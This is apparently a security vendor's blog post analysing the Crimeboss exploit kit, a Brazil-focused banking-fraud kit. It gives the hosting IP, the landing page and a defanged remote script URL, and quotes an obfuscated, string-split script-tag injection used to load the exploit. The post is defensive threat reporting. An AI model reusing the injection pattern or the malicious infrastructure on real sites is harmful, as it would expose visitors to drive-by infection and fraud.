A Quick Look at the Crimeboss Exploit Kit

[Nate and Jacob are analysts on the WebPulse team. A week or so ago, they did some poking around a site running the Crimeboss exploit kit, and I thought their findings were worth sharing. --C.L.]

An exploit kit known as "Crimeboss" has been in the news for a couple of months. There's a good write-up about the Java exploits it serves here. [My favorite part is that it will actually prompt you to install Java if you don't have it, so that it can then infect you.]

The sample we played with is hosted at 61.19.251.27, a server located in Thailand. The landing page is the aptly-named cb.php. From there, a page is generated with the following obfuscation:

“’<sc’ + ‘ri’ + ‘pt src=hxxp://aidgo.com.br/cbx/index.php?setup=d&s=2&r=’ + a randomly generated number here” plus some more stuff and an obfuscated closing script tag.

Upon visiting that lovely site we hit the exploit, which nails you with nasty bits from several different pages. Crimeboss mostly focuses on banking fraud, mostly in Brazil (where it likes to utilize hacked .com.br sites in its attacks).

Interestingly enough, included at the bottom of the page is a string of 64-bit text. Decode that to get a string of hex text. Decode THAT and you get a message in Portuguese, which, translated into English, gives a peek into the culprit’s mind:

“Greetings to my fellow workers crimesciberneticos.com blog.
Knowing that we know nothing beyond good and evil, after all the only thing absolute is that everything is relative.
A hug, your friend Psychlo.
by Psychlo”

Crimesciberneticos.com is a security blog, so apparently "Psychlo" is assuming they'll be looking at his code at some point, and has left them a friendly note...

We're keeping an eye out for more Crimeboss sites.

--N.C and J.S.

[After several minutes of searching, I wasn't able to find anyone who's blogged about the note from Psychlo in Crimeboss pages, so I thought this deserves a wider audience... --C.L.]